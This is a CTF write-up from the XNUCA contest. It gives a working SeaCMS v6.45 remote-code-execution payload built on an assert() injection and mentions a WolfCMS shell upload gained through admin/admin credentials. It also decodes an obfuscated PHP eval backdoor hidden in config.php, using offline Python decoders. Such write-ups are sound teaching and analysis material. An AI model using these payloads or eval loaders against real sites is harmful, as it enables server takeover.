XNUCA-Writeup

# No.8 Watching videos is real fun (read: 50 pts, write: 100 pts)

Keywords: tier-1 target challenge
===============================================================
Relax with a movie this weekend!

SeaCMS (海洋cms) v6.45 front-end getshell vulnerability

payload:

```text
url:  http://6f781364dedf5dc1eb877079f415877b.xnuca.cn/search.php?searchtype=5&tid=0&year=23334444);assert($_POST[1]);//
post: searchword=d&order=}{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end if}&func=assert&cmd=phpinfo();
```

phpinfo() executes normally.

Execute commands through the `system` function:

1. Find the flag location
2. Read the flag
3. Create a file

# No.23 Find the entrance (read: 100 pts, write: 200 pts)

Keywords: tier-2 target challenge
===============================================================
What is the basic function of this site?

Found the site's admin back end; it uses the weak credentials username=admin&password=admin.

WolfCMS arbitrary file upload

Upload a shell directly from the back end, then work out its path from the front-end logo.

Following the same routine as the previous challenge, read the flag and write the file.

Round 3

0x00 Information gathering

#### Steps
Following the hint, open main.js and find the author information:

```javascript
/*
 * main.js v1.0
 *
 * 2017/5/20
 * author l1Kai@youngin.uu.me
 *
 */
```

The author is found on GitHub: https://github.com/l1Kai/user

This yields config.php and the flag:

```php
<?php $payload="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";
preg_replace('/.*/e',"\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x24\x70\x61\x79\x6c\x6f\x61\x64\x29\x2c\x30\x29\x29\x29",'.'); ?>
flag{e76cd8c1-d747-4259-aaac-bc36efe62462}
```

FLAG value

flag{e76cd8c1-d747-4259-aaac-bc36efe62462}

0x01 Information analysis

#### Steps

Use Python to print the `\x`-escaped part; it decodes to:

```php
eval(base64_decode(gzinflate(base64_decode($payload),0)))
```

Decode with PHP, replacing `eval` with `echo` so the payload is printed rather than executed:

```php
<?php
$payload="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";
echo (base64_decode(gzinflate(base64_decode($payload),0)));
?>
```
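Because the writeup's `$payload` value is elided above, here is an added Python equivalent of the two steps just described; it is not code from the writeup. It decodes the `\x` escape sequence to recover the hidden `eval(...)` call, applies the writeup's eval-to-echo swap on the recovered text, and reverses the three encoding layers (base64, then raw DEFLATE as consumed by PHP's `gzinflate()`, then base64) offline with the standard library so nothing is executed. `SAMPLE_SOURCE` is a constructed stand-in for the real config.php, wrapped in the same three layers so the decoder can be exercised without the original value.

```python
import base64
import re
import zlib

# The escaped second argument of preg_replace('/.*/e', ...) as quoted in the writeup.
ESCAPED = (
    r"\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65"
    r"\x28\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5f"
    r"\x64\x65\x63\x6f\x64\x65\x28\x24\x70\x61\x79\x6c\x6f\x61\x64\x29\x2c\x30\x29\x29\x29"
)

# Constructed stand-in for the decoded config.php; the challenge's real content is not on the page.
SAMPLE_SOURCE = (
    "\nrequire(__DIR__.'/function.php');\n"
    "define('PRO_KEY', 'PLACEHOLDER_KEY'); // constructed sample value\n"
)


def unescape_php_hex(s: str) -> str:
    """Turn PHP double-quoted \\xHH escapes back into the characters they hide."""
    return re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)


def eval_to_echo(php_expr: str) -> str:
    """The writeup's trick: swap the leading eval( for echo ( so PHP prints instead of runs."""
    return re.sub(r"^eval\(", "echo (", php_expr)


def decode_layers(payload: str) -> str:
    """Reverse base64_decode(gzinflate(base64_decode($payload))) without executing anything.

    PHP's gzinflate() consumes a raw DEFLATE stream, which is zlib with wbits=-15.
    """
    stage2 = base64.b64decode(payload)
    stage1 = zlib.decompress(stage2, -15)
    return base64.b64decode(stage1).decode("utf-8")


def build_sample_payload(php_source: str) -> str:
    """Apply the same three layers in the forward direction (only used to make test input)."""
    stage1 = base64.b64encode(php_source.encode("utf-8"))
    comp = zlib.compressobj(level=9, wbits=-15)  # raw DEFLATE, the counterpart of gzdeflate()
    stage2 = comp.compress(stage1) + comp.flush()
    return base64.b64encode(stage2).decode("ascii")


if __name__ == "__main__":
    hidden_call = unescape_php_hex(ESCAPED)
    print("hidden call :", hidden_call)
    print("dump version:", eval_to_echo(hidden_call))
    payload = build_sample_payload(SAMPLE_SOURCE)
    print("recovered source:")
    print(decode_layers(payload))
```

Decoding in Python rather than in PHP removes the risk that a stray `eval` or `preg_replace` `/e` modifier runs the recovered code during analysis; the only PHP-specific detail to get right is that `gzinflate()` expects a raw DEFLATE stream, hence `wbits=-15`.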

This yields config.php:

```php
require(__DIR__.'/function.php');

define("DBHOST","127.0.0.1");
define('DBUSER','');
define('DBPASS','');
define('DBNAME','');
define('ROOTDRI',__DIR__."/../");
define("WEB_TITLE",'标题');
define("PRO_KEY","***....");// where is PRO_KEY ?

if (!get_magic_quotes_gpc())
{
    if (!empty($_GET))
    {
        $_GET = addslashes_deep($_GET);
    }
    if (!empty($_POST))
    {
        $_POST = addslashes_deep($_POST);
    }

    $_COOKIE = addslashes_deep($_COOKIE);
    $_REQUEST = addslashes_deep($_REQUEST);
}

require(ROOTDRI.'/org/smarty/Smarty.class.php');
session_start();

exit;
```

Looking through the earlier commit history, find the original config.php and change the PHP so that it prints the decoded code instead of executing it:

```php
<?php
// Hand-rolled base64 decoder: the 65-character alphabet (64 symbols plus '=' padding)
// and the 6-bit-to-8-bit shifts below are the standard base64 table algorithm.
function _rZBFc5($_AXxuMn)
{
    $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    $chr1 = $chr2 = $chr3 = "";
    $enc1 = $enc2 = $enc3 = $enc4 = "";
    $i = 0;
    $output = "";
    $_AXxuMn = preg_replace("[^A-Za-z0-9\\+\\/\\=]", "", $_AXxuMn);
    do {
        $enc1 = strpos($keyStr, substr($_AXxuMn, $i++, 1));
        $enc2 = strpos($keyStr, substr($_AXxuMn, $i++, 1));
        $enc3 = strpos($keyStr, substr($_AXxuMn, $i++, 1));
        $enc4 = strpos($keyStr, substr($_AXxuMn, $i++, 1));
        $chr1 = $enc1 << 2 | $enc2 >> 4;
        $chr2 = ($enc2 & 15) << 4 | $enc3 >> 2;
        $chr3 = ($enc3 & 3) << 6 | $enc4;
        $output = $output . chr((int) $chr1);
        if ($enc3 != 64) {
            $output = $output . chr((int) $chr2);
        }
        if ($enc4 != 64) {
            $output = $output . chr((int) $chr3);
        }
        $chr1 = $chr2 = $chr3 = "";
        $enc1 = $enc2 = $enc3 = $enc4 = "";
    } while ($i < strlen($_AXxuMn));
    return $output;
}
// Thin wrapper so the call site does not reveal the decoder's name.
function _g1S4Ve($_XJwGpK)
{
    return _rZBFc5($_XJwGpK);
}
// Raw DEFLATE decompression, i.e. gzinflate().
function _Xvtafz($_4LYEpc)
{
    return gzinflate($_4LYEpc, 0);
}
// The execution sink (eval); left unused after the change below.
function _ehljDM($_j045Zz)
{
    return eval($_j045Zz);
}
$_Za0oXi = "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";
// The writeup's change: echo the decoded source instead of handing it to eval.
echo _g1S4Ve(_Xvtafz(_g1S4Ve($_Za0oXi),0));
?>
```
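The renamed functions above are the whole obfuscation: `_Xvtafz` is `gzinflate`, `_ehljDM` is `eval`, and `_rZBFc5`, despite its size, is an ordinary base64 decoder, recognisable by the alphabet string ending in `=` and the 6-bit shifts. The Python port below is added here to confirm that (it is not part of the writeup): it reproduces the hand-rolled logic and checks it against `base64.b64decode` on constructed inputs covering every padding case, so an analyst can substitute the library call with confidence. The PHP version first runs a `preg_replace` over its input; the port skips that step and requires well-formed base64 (length a multiple of 4).

```python
import base64

# The same alphabet string the obfuscated _rZBFc5() carries; index 64 is the '=' pad.
KEY_STR = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
PAD = 64


def custom_b64decode(text: str) -> bytes:
    """Port of _rZBFc5(): four 6-bit symbols -> three bytes, dropping bytes behind '=' pads."""
    if len(text) % 4 != 0:
        raise ValueError("input length must be a multiple of 4 (well-formed base64)")
    out = bytearray()
    for i in range(0, len(text), 4):
        # strpos($keyStr, ...) in the PHP; str.index raises on characters outside the alphabet
        e1, e2, e3, e4 = (KEY_STR.index(c) for c in text[i:i + 4])
        out.append((e1 << 2 | e2 >> 4) & 0xFF)          # $chr1
        if e3 != PAD:
            out.append(((e2 & 15) << 4 | e3 >> 2) & 0xFF)  # $chr2, skipped on "xx=="
        if e4 != PAD:
            out.append(((e3 & 3) << 6 | e4) & 0xFF)      # $chr3, skipped on "xxx="
    return bytes(out)


def matches_standard_base64(samples) -> bool:
    """True when the port and the standard library agree on every sample."""
    for raw in samples:
        encoded = base64.b64encode(raw).decode("ascii")
        if custom_b64decode(encoded) != raw:
            return False
    return True


# Constructed inputs: lengths 0..6 exercise zero, one and two '=' pads; range(256) covers every byte.
SAMPLES = [b"", b"f", b"fo", b"foo", b"foob", b"fooba", b"foobar",
           bytes(range(256)), b"<?php\n/* constructed sample */\n"]


if __name__ == "__main__":
    print("hand-rolled decoder matches base64.b64decode:", matches_standard_base64(SAMPLES))
    print(custom_b64decode("Zm9vYmFy"))
```

Once the equivalence is established, the whole decode chain collapses to the single library expression used in the previous section, and the obfuscated file can be analysed without running any of its own functions.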

This gives the flag:

```php
/* flag{9660dc40-0272-44fd-a045-6e6f0f98fca0} */
require(__DIR__.'/function.php');

define("DBHOST","127.0.0.1");
define('DBUSER','');
define('DBPASS','');
define('DBNAME','');
define('ROOTDRI',__DIR__."/../");
define("WEB_TITLE",'标题');
define("PRO_KEY","1071f87ebcf2fb9f96f174eca1ee2dd6");

if (!get_magic_quotes_gpc())
{
    if (!empty($_GET))
    {
        $_GET = addslashes_deep($_GET);
    }
    if (!empty($_POST))
    {
        $_POST = addslashes_deep($_POST);
    }

    $_COOKIE = addslashes_deep($_COOKIE);
    $_REQUEST = addslashes_deep($_REQUEST);
}

require(ROOTDRI.'/org/smarty/Smarty.class.php');
session_start();

exit;
```

FLAG value

flag{9660dc40-0272-44fd-a045-6e6f0f98fca0}

0x02 Start the penetration

#### Steps

The GitHub project is named user; visiting the user directory prompts for a login.

From the login page, the username is an e-mail address; the password is guessed from the hints given.

The e-mail is the GitHub e-mail and the password is likai, which yields the flag.

FLAG value

flag{cc498da1-3918-48be-b9e2-c64c69a5349e}